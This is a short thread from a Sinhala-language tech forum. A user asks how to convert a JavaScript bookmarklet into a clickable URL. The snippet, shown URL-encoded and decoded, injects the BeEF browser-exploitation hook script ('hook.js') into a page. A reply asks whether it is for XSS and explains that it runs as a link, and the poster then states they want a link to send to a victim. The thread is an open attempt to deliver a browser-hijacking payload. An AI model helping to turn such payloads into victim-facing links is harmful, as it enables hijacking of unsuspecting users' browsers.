ඔබ තවමත් Widane Forums සාමාජිකයෙක් නෙවෙයි ද..?

Widane Forums හි සියළුම ලිපිවල ඇති සියළුම Links වෙත පිවිසීමට නම් ලියාපදිංචිවීම අනිවාර්යයි.
ඔබගේ සියලුම තාක්ෂණික ගැටළු සඳහා විසඳුම් සොගැනීමට වගේම දැනුම බෙදාගැනීම සඳහා මෙහි ඉඩකඩ වෙන්කර තිබෙනවා.
ඉතින් ඇයි තවත් බලාගෙන ඉන්නේ ඉක්මනින් ලියාපදිංචිවී ඔබගේ දැනුම වැඩිකරගන්න.

Register Here
Help JS to URL
#1
javascript ekak url ekak karane kohomada.danna kenek kiyala denna.

javascript:%20(function%20()%20{%20var%20url%20=%20%27http:%2f%2f127.0.0.1:3000%2fhook.js%27;if%20(typeof%20beef%20==%20%27undefined%27)%20{%20var%20bf%20=%20document.createElement(%27script%27);%20bf.type%20=%20%27text%2fjavascript%27;%20bf.src%20=%20url;%20document.body.appendChild(bf);}})();

meka url ekak karagan one.

#2
help
.
Reply
#3
තව ටිකක් පැහැදිලි කලා නම්....

XSS වගේ වැඩකටද?

javascript: (function () { var url = "http://127.0.0.1:3000/hook.js";if (typeof beef == "undefined") { var bf = document.createElement("script"); bf.type = "text/javascript"; bf.src = url; document.body.appendChild(bf);}})();

ඔය දීලා තියෙන එක නම් <a href="..."> විදිහට දුන්නම ලින්ක් එකක් වගේ තමා. ඕක කොහොමත් එහෙම තමා රන් කරන්න ඕනෙ...
Reply
#4
(04-29-2019, 10:37 AM)0xEDD1E Wrote: තව ටිකක් පැහැදිලි කලා නම්....

XSS වගේ වැඩකටද?

javascript: (function () { var url = "http://127.0.0.1:3000/hook.js";if (typeof beef == "undefined") { var bf = document.createElement("script"); bf.type = "text/javascript"; bf.src = url; document.body.appendChild(bf);}})();

ඔය දීලා තියෙන එක නම් <a href="..."> විදිහට දුන්නම ලින්ක් එකක් වගේ තමා. ඕක කොහොමත් එහෙම තමා රන් කරන්න ඕනෙ...
 mata one victim kenekta yawanna wage link ekakata convert krgnna
Reply
Users browsing this thread: 1 Guest(s)